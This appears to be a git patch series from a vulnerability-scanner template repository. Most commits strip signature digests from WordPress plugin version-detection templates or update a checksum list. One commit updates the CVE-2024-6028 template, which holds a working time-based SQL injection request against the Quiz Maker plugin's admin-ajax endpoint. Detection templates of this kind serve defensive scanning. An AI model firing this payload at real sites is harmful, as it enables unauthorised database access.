--git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index fbaadbaf77..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204124b3bab9b63e0c432c92478122dcc695554f19ee9062162b0abcd964347e5a0220298c6dfbd0ba857f0a14dc4bbbbca08e1f96194367b7e531c4c7920c7cfecb29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index a75b151044..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e96dbaaa6779a8027f24517e2bf5d8da1c21cc5c9dfcfc3ef26a0762bb4e9b45022100c6d9d87c2fc5da5d504b69f7913fd68d4aa3c98d41ef67c613a404d58b767cdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 8453a304e5..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210098fc16fb22ce49d200718cb966cad6ce4fbbdcc9b11e08b14ac91415c33583de022100dc70ab0efa9a5075969f3b84080221a13aaea2e0e6c35d7dec3e27ad593bb2f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index fbe13775dc..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a8176a475e85cb58ccc56189f6c150025fa1772dfaa8ab77bc5eeb85f9e618220221009ab36c3ec3f36d540abb41283dea69b4b5140a11a9da639b1da7d9c99c1a6d4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 6b09e1409a..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da72544c9efcf3e2d734eba357fc6fa239de3f9aaad8ae0a87bb44b6240d046d0220008c5d11cedfb04bef45457a730fec63a5c6bd870ae625c6a359ee59470100fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 08ec515eae..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050bc88361fa4105d91c39b0731ced0371f9dcf26d6e917eccad226952ba8272c0221008ac6da9df93ccf23b0d23e40a15e5df52ac640c2c9fadf09d8b339d9eeb80905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index ed393cdcb6..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220034377b80de8e4f047c450efb7a01af620e072440f89ee597a788e786c60ec8b02206867fb020c1c47db7afb1b9d896166834367879deee99c5ddf5dc4b02578b389:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 932685fbbe..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fdff1432f21aedc12cc4bb3e3a78d2ae09fc9cb73e4d68183c40e051e54c1aee0220574cd157179f7ffa5b5ed57c0c2b160adceb46f23d3c76a399288dcf7f996b52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 5a3167e662..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a00aeb4a778ac9c3cc4e71ec0fe5c6168a6f3ee9c01d6a317a32464215c413602203d096d21e2d6de616cf0d5e4b79a592c77e12f32c704df95e7134518752f9f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 5a44fbd83b..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ea94e7d08b139c5859d40eda25e3de91df4f572ccab2ffcf2d397080943336c0221008ff287d752e7cffb24e04515a48015b5c12eca5bdfa61319961e3735679655fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 4af76b1a73..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff9cddce66f2c3e1e6ff9b28a6d56fb165156f4222376100903e4234dc825b4f022027ded33992c1de37f50664ab4b2abf1918d712bc2459f4036b12114b91fa025f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index af83e6ba6f..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b4b28851b0c042d7fb66c20838e9053d03fd5acb0f56efe1ebd72fdd6d24feab0221008c7cb9b9e91d1c6fc6c5b9bf82460744c244d11728d362104343208f9d4c99cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index b58f452fa9..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ff23dab8b01e58c49444b51d16ef5f51fd96a331e83bca4fcb2c1ac5414e9d8b022100ae26cbd8244b6d381476c7eb20c8d9b04cbbe98231522140e8f8d4fa8179c219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index c065be48af..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d52c1e2dbffded28eee83d24851a14b7ad491d94998fe8c1df4257575e660f3c022100d13a9aece14bfc0923b22470ca39f749f874bd3cecf9216e9515f6f1ecb2c99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 5e7dca7e38..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206dcb6b3c7a6517b4391a9140b730283cdb8f98f117856375548a52d8b33ac2240220266506b26a932941de58bf87f9207ba98b618f38418cad1b6ff02d575cf06b75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 8f24ae366e..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022062713231602615b01c4efa028f7924e8d79e0172a006582d108d06bf8e965c490220743b569047fac020498bc7850a3b74f820009a31f9a738c91f6591397d43c870:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bd0d4f39c0..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220740dc43515a03007264f5b2d1ecdfbdf5ab1bbed07d02c64e4478721b85a1873022100f9379900aea5aed2cb787e8b5e154a156267ff0f5e5060e082b137cafc6e4787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 8c014d247e..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220200926473e2f19cc852643c5a16455b5f9d068402e22ad5ff7f98607bc26e3b9022027295c1fc891ef800b127e534355430b0bb043542c5cfef1802acc5c9019383c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 7524bc9e40..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a86e4ebf21dc34233642c782becb95ff8ba66c9ac7d6b2edda0ede240fdfbd502202620e998347f53680c5aa97f038dcab6e3bc448d1d62fd35f74bdd124bfb2103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index e869b55714..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201acb87ed521548fcee6374979d308fc0c0db8462878a3cb762d03de522b179ff022050bcd8c3479f7f9e11f22b7d1ea32d308b65d683f416f424a067a9ad57cf7e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 4af5728352..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001cd5bb09d3028487bd784899a99148caf0d2a518c6af87a0c77a97bed56b84702204928b3bc3bbb4dc3dd381618846de6a1b3b39ccfeae6f395b4725ce5d6d7a53e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index ef9ed158ed..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c95241a69b3996ab095caeb7b588ca8a7b75fa12cf48699f12069eecac0c69f0221009fb1bae9308508ad337bb7edece1ce200396cbb64b76641bc1224bcc13c1bcc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 6d60c9d4ad..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022077582c7cf95eb1e48b610befd961c9695747b013aafd86117d9f32fee200c65602207cc3c79dd66661f02231ce8c57dd3011c25c7769f1405ae291f8a2cd563dc21d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 3ef7fe35e8..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cec1597641501d897d90e85bb8c393e76ffb853646f1797b19938e4531a402b50220461567b9d9fa4e5a361ac0ae4ac004dcd4d19045f1cb5d52f4df4ae134ba092d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index fd830f0f99..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220745a0459821bb1af6effe13357e3f3c711b42026193020c2dddb8b8b03e1fc80022100f2393b9a8c6073dc39855a3b6566133dbda90a54f9b509a21a9ffeec5460b6ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index dae22332ec..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f3aae13f27a95daafdcf28c94c845e808a64ebbca774eadb8c701e7b3fea9f6022100bb54612d0573c4af2fdf17563b35f5ba9e74a9d07ea52b5e35f1ce18ec6d013d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 49fcf287f5..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200fe2030b312e2fea73a5a3cc151079f30510c6875b5b4469490f866dd16e9f9d022100ea10a4c572db5d09f00bbad23ca96b5d864cebf140804634d900150925bdea8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 6ea9688142..58e5e828bf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008b42a86994e1cecd1b9bb059722f2293335b1c7f09e16d815dc9ded1e610dfa3022019ced94ef5b4bed9835a2e74ae2d8928e1332feaa97f5dd80415d38ae817b684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index d522b38494..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bfcd30eab8eaa15aaef16883c5b7c9847cfe2671db2631625563ed560ec2d9070220639068ff4c774c05aba8c725e53b04a7efbd5183d9c4cc581df23248f3d04cfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 9430f5add4..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e8894d31dd768e239fa0b1d5458209af9b0c7d8536a9b0d12e3514d7cab7f38502205b947766382d88ea7dee3a699677bd4a51862d4042313d914e1d2214332cfec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 703e1b7ea9..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008d2e00975103bd4e18299d6a479d4fdb1e8ba0300be6f3e195fec85c4a3837be022100c6f287ee4e7e7c0287321184aae27c5482027a997a8208944faa6ae58926ea57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 252f739acaf386e495f07c63f21281f9e49f5bd6 Mon Sep 17 00:00:00 2001 From: Ice3man <nizamulrana@gmail.com> Date: Thu, 27 Jun 2024 11:01:29 +0530 Subject: [PATCH 0658/1841] Update CVE-2023-46298.yaml --- http/cves/2023/CVE-2023-46298.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-46298.yaml b/http/cves/2023/CVE-2023-46298.yaml index 0aa9402dbc..23f7438850 100644 --- a/http/cves/2023/CVE-2023-46298.yaml +++ b/http/cves/2023/CVE-2023-46298.yaml @@ -9,6 +9,7 @@ info: reference: - https://github.com/vercel/next.js/compare/v13.4.20-canary.12...v13.4.20-canary.13 - https://github.com/valentin-panov/nextjs-no-cache-issue + - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 From 452fc31905ebf1a299beeb3f64c2b4a0e27e3099 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 27 Jun 2024 13:46:01 +0530 Subject: [PATCH 0659/1841] updated req, info & payload --- http/cves/2024/CVE-2024-6028.yaml | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-6028.yaml b/http/cves/2024/CVE-2024-6028.yaml index f999194761..2fe98c7865 100644 --- a/http/cves/2024/CVE-2024-6028.yaml +++ b/http/cves/2024/CVE-2024-6028.yaml @@ -8,29 +8,33 @@ info: The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. remediation: Fixed in 6.5.8.4 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-6028 - https://github.com/truonghuuphuc/CVE-2024-6028-Poc + - https://nvd.nist.gov/vuln/detail/CVE-2024-6028 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-6028 + cwe-id: CWE-89 metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/quiz-maker/" - tags: cve,cve2024,wp-plugin,quiz-maker + tags: cve,cve2024,wordpress,wp,wp-plugin,quiz-maker,sqli http: - raw: - | - @timeout: 45s + @timeout: 25s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Content-Length: 114 - ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,4,0)]=&action=ays_finish_quiz + ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,6,0)]=&action=ays_finish_quiz matchers: - type: dsl dsl: - - 'duration>=4' + - 'duration>=6' - 'status_code == 200' - - 'contains_all(body,"status","scoreMessage","displayScore")' + - 'contains_all(body,"status\":","scoreMessage","displayScore")' condition: and From fad22c75cf6e935dc07e6500e329265954d18dc2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 09:36:13 +0000 Subject: [PATCH 0661/1841] Auto Generated Templates Checksum [Thu Jun 27 09:36:13 UTC 2024] :robot: --- templates-checksum.txt | 428 ++++++++++++++++++++--------------------- 1 file changed, 214 insertions(+), 214 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 03db1683f7..d2b1b14c13 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -738,7 +738,7 @@ helpers/wordpress/plugins/akismet.txt:fb52ada446f84acb5529ace8fe4f25e203a5dddb helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f helpers/wordpress/plugins/all-in-one-seo-pack.txt:4a74356d25940a094bf92b6722f74e38e3ad55ec helpers/wordpress/plugins/all-in-one-wp-migration.txt:41d75a1151922be816d326fae3463dc4a05124b0 -helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:713afc477e35aa343e8d0dd831aa85fab6ba2e0f +helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 helpers/wordpress/plugins/amp.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 helpers/wordpress/plugins/astra-sites.txt:9bab51b354b67876c6284de28df0e549940fb873 @@ -754,7 +754,7 @@ helpers/wordpress/plugins/broken-link-checker.txt:47ac56ccfa5b6db61c32cb48c2dda8 helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 -helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:83883f9a9f04a04af0c790df93d414e14826cfb7 +helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e helpers/wordpress/plugins/cloudflare.txt:95b4f085ec6b3a33a23781c7cfda78c317e5dca1 helpers/wordpress/plugins/cmb2.txt:6f2af731f80db655385d3795034b4b4bdd02a8bf helpers/wordpress/plugins/coblocks.txt:0f766def7495524760bb6627fe20754b1b42201b @@ -782,7 +782,7 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f -helpers/wordpress/plugins/elementor.txt:d66c7300e5cd945308f5af8da71dabbe7590aee1 +helpers/wordpress/plugins/elementor.txt:9e43adc2b2562071078f6f82962886b245d01a6a helpers/wordpress/plugins/elementskit-lite.txt:b981b5efd3a591e7a7cda1a4740574ce3b34b19a helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 @@ -801,7 +801,7 @@ helpers/wordpress/plugins/ga-google-analytics.txt:685772c638221af0e5cd971e0621df helpers/wordpress/plugins/gdpr-cookie-compliance.txt:2f4af87dfd67a2385a4e30cfbd4d57d669853135 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:bc9981e1c7ebf53d15d8cf9698c2bb6137881fc9 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:ba46cbfd15f3e265cd93b9b01e7e97a6fbfa3a14 -helpers/wordpress/plugins/google-listings-and-ads.txt:ce69193a5f086b7c0e6f20efbf6aee50c63e8244 +helpers/wordpress/plugins/google-listings-and-ads.txt:f0500ea689c78156fdded5bae29d903f2d632a9b helpers/wordpress/plugins/google-site-kit.txt:b112d64c12ea14bbfa5671fe7ac7af8d575b1e0b helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 @@ -815,16 +815,16 @@ helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b2 helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf helpers/wordpress/plugins/hostinger.txt:2eb538e42b910c397ab801353b059c51f265f092 -helpers/wordpress/plugins/image-optimization.txt:5e0ad8390d778d86a4a369e5ad6950036a8ebb86 +helpers/wordpress/plugins/image-optimization.txt:e2060004dffbdc6873d309c73a458221a047212b helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 helpers/wordpress/plugins/insert-headers-and-footers.txt:b02d54c37a0b10952ea10194f9d0deec6e24ff40 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b132e5511e91d95bea5 helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c -helpers/wordpress/plugins/jetpack-boost.txt:d8521792e123691f48a1df559885c477069c6c1d +helpers/wordpress/plugins/jetpack-boost.txt:6296d4732b242d110df8dee2fc52e75587f5910b helpers/wordpress/plugins/jetpack.txt:a861c6358fded34510ab1962eb66230220d77942 -helpers/wordpress/plugins/kadence-blocks.txt:88e08e0e9092f4e08e09cd001ea68a3e37a33e66 +helpers/wordpress/plugins/kadence-blocks.txt:5a6afbb0d73a747e57b24cbb36f22da4692362e5 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:3996adb4a5baf85b23093a06a6e8607146c2380c @@ -858,7 +858,7 @@ helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a 